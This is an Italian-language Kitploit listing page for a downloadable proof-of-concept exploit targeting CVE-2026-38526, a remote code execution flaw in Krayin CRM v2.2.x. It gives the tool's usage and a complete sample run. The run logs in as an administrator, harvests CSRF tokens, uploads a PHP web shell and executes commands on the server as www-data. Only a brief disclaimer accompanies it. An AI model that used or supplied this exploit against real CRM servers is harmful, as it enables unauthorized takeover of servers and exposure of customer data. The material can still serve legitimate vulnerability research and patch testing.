Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-38526-KrayinCRM-RCE — CVE-2026-38526 Exploit | di infrar3d | Kitploit
Strumenti/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

CVE-2026-38526 Exploit | di infrar3d

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

CVE-2026-38526 - RCE su Krayin CRM

xpl0ited by infrar3d

Questo è un proof-of-concept di Remote Code Execution (RCE) specificamente progettato per Krayin CRM v2.2.x, un sistema di gestione delle relazioni con i clienti open-source. Lo script automatizza lo sfruttamento di una vulnerabilità di upload di file nell'interfaccia amministrativa del CRM per ottenere l'esecuzione remota di comandi sul server target.

Utilizzo:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

Esempio:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

Questo script carica una shell PHP cmd da revshells.com per impostazione predefinita.

Dopo lo sfruttamento, puoi aprirla nel tuo browser e inviare comandi dalla pagina web.

⚠️ Dichiarazione di non responsabilità ⚠️

Questo software e il codice proof-of-concept sono forniti solo per scopi educativi e di ricerca.

  • Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
  • Non utilizzare contro alcun sistema senza esplicita autorizzazione preventiva.
  • L'uso di questi strumenti per attaccare target senza consenso è illegale.

Sei responsabile del rispetto di tutte le leggi applicabili. Usalo in modo etico e responsabile.

Scarica lo strumento